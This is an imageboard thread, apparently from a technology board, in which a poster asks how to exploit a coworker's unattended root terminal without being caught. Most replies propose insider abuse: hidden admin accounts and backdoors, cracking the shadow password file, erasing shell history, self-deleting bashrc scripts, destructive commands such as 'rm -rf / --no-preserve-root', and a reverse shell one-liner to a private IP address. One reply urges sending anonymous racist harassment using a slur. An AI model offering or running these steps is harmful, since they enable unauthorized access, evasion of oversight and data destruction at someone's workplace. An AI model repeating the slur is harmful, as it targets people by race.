Tech guy in my company forgot an open root terminal open in my session.
What can I possibly do with it without risking getting caught?

Add a user with privilege under some non suspect name and get stuff done from now on.
Sudo apt-get install tuxkart
>root terminal open
>Sudo
Unable to read the sudoers for some reason, I can't risk it without knowning there is more than 1 root account
Create another admin user and sit on it for awhile before doing anything serious.
Oh well never mind then

exit
remember the history file
install gentoo
delete everything and run.
unset HISTFILE && exit does it fine
BUT is it the only history?
I might aswell just take the computer with me, it has 16 cores while I can't have 3 meals a day . Probably worth more than my life

Edit bashrc so it calls your own script.
The same script deletes the last lines of bashrc when done and deletes itself
copy the hashed root password from the shadow file and try to crack it
Not bad.
rm -rf –no-preserve-root /
chmod 555 /
chmod -R 7777 /
edit the bashrc file and add the following
printf '%s\n' 'I didn't hack you mr IT guy but next time you forget to log out I will not be so merciful'
Then log out
Edit the bashrc to delete a random file from /bin
Slowly it will come falling down
>my company
just tell him to fuck off
rm -rf / --no-preserve-root
Or add in some backdoor for later
Close it and get on with your work
Exit

Send a message to anyone in the company who is white and dating a nigger
Send it anonymously - like
Hey pssst, coalburner, come home white man
delete everything with dd
>not knowing what root is
you need to go back >>Jow Forums
chmod -x `which chmod`
This, if you're CEO/Chair, just demand the root password
start a new thread with a reverse shell so you can root in whenever you want
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
then clear bash history
make an ascii art something and alias echoing it to some really common command in the bash profile.
based
How do you connect to that once that command is run?
leaving it alone and telling your sysadmin when he gets back
